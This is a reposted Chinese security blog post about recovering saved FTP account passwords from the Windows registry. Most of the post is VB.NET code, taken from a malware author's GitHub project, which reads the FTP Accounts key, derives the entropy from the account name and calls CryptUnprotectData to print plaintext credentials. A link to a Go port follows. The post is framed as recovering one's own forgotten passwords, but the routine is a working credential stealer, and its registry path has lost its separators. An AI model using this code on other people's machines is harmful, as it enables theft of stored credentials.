windows注册表ftp账号密码获取

admin 2024年11月11日23:45:27评论10 views字数 1405阅读4分41秒阅读模式

某年某月某日,有一个需求,windows注册表ftp账号密码获取,网上一搜,确实没搜到... 搜到了一些古老的还原gui工具,下载安装了用不了(被骗)///

windows注册表ftp账号密码获取

windows注册表ftp账号密码获取

后来在github搜对应注册表位置的涉及代码,还真有人写过,一看项目是搞恶意软件的哥.很好很awesome

windows注册表ftp账号密码获取

代码如下,复制凑数...
Dim ftpAccounts As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SoftwareMicrosoftFTPAccounts")            For Each account As String In ftpAccounts.GetSubKeyNames()                Dim accountKey As Microsoft.Win32.RegistryKey = ftpAccounts.OpenSubKey(account)                For Each user As String In accountKey.GetSubKeyNames()                    Dim userKey As Microsoft.Win32.RegistryKey = accountKey.OpenSubKey(user)                    Dim pass() As Byte = CType(userKey.GetValue("Password"), Byte())                    Dim dwEntropy(3) As Byte                    For j As Integer = 0 To account.Length - 1                        Dim c As Byte = CByte(AscW(account(j)) And &H1F)                        dwEntropy(j And 3) = dwEntropy(j And 3) + c                    Next                    dataIn.cbData = pass.Length                    dataIn.pbData = Marshal.AllocHGlobal(pass.Length).ToInt32()                    Marshal.Copy(pass, 0, New IntPtr(dataIn.pbData), pass.Length)                    dataOut.cbData = 0                    dataOut.pbData = 0                    Dim gc As GCHandle = GCHandle.Alloc(dwEntropy, GCHandleType.Pinned)                    Entropy.pbData = gc.AddrOfPinnedObject().ToInt32()                    Entropy.cbData = 4                    CryptUnprotectData(dataIn, 0, Entropy, 0, 0, 0, dataOut)                    gc.Free()                    OL += "|URL| " & String.Format("ftp://{0}@{1}/", account, user) & vbNewLine & "|USR| " & user & vbNewLine & "|PWD| " & Marshal.PtrToStringUni(New IntPtr(dataOut.pbData)) & vbNewLine                    LocalFree(dataOut.pbData)                Next            Next

VB代码搞下来感谢zk帮忙调试,大概用go写了一板获取ftp账号密码的,放github上了,帮助忘了账号密码的家人们。

https://github.com/Zhu013/registry_ftp_password_get

windows注册表ftp账号密码获取

对了密码得保存才有

windows注册表ftp账号密码获取

原文始发于微信公众号(FXDSecurity):windows注册表ftp账号密码获取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日23:45:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   windows注册表ftp账号密码获取http://cn-sec.com/archives/1933505.html

发表评论

匿名网友 填写信息